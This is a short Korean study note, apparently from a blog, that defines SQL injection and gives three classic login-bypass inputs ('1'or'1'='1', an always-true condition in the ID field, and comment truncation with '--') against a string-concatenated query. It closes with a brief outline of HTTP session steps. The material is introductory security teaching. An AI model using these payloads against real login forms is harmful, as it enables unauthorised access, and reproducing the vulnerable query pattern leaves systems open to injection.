728x90
반응형
정의
- 데이터베이스 서버에서 실행되는 SQL문에 악의적인 코드를 추가하거나 삽입하여 권한이 없는 사람이 정보를 획득하거나 데이터를 삭제, 수정하는 공격기법
- 악의적인 목적으로 데이터가 저장된 데이터베이스 서버에 전달하는 SQL문을 변조함으로써 정보의 유출, 인증우회, 데이터수정, 삭제 등의 일을 수행할 수 있게 하는 웹해킹 기법
기본방법 - 인증 우회
SQL = "select * from member where userid='"&userid&"' and pwd='"&pwd&"'"
SQL = "select * from member where userid='anything' and pwd='1' or '1' = '1'"
id = anything
pw = 1'or'1'='1
or '1' = '1' 구문이 true로 작용하여 로그인이 성공한다.
기본방법 - Password 우회 (해당하는 id를 아는 경우)
SQL = "select * from member where userid='"&userid&"' and pwd='"&pwd&"'"
SQL = "select * from member where userid='test'or'1'='1' and pwd='anything'"
id = test'or'1'='1'
pw = anything
or '1' = '1' 구문이 true로 작용하여 로그인이 성공한다.
기본방법 - Password 우회 (주석 사용)
SQL = "select * from member where userid='"&userid&"' and pwd='"&pwd&"'"
SQL = "select * from member where userid='test'-- and pwd='anything'"
id = test'--
pw = anything
-- 주석 구문으로 무력화되어 로그인이 성공한다.
HTTP 통신절차
페이지/이미지
- 세션 연결 ( 나는 너와 통신하고 싶다. )
- 데이터 송.수신 ( 웹 브라우저에 페이지 로딩 )
- 세션 종료 ( 통신 종료)
반응형
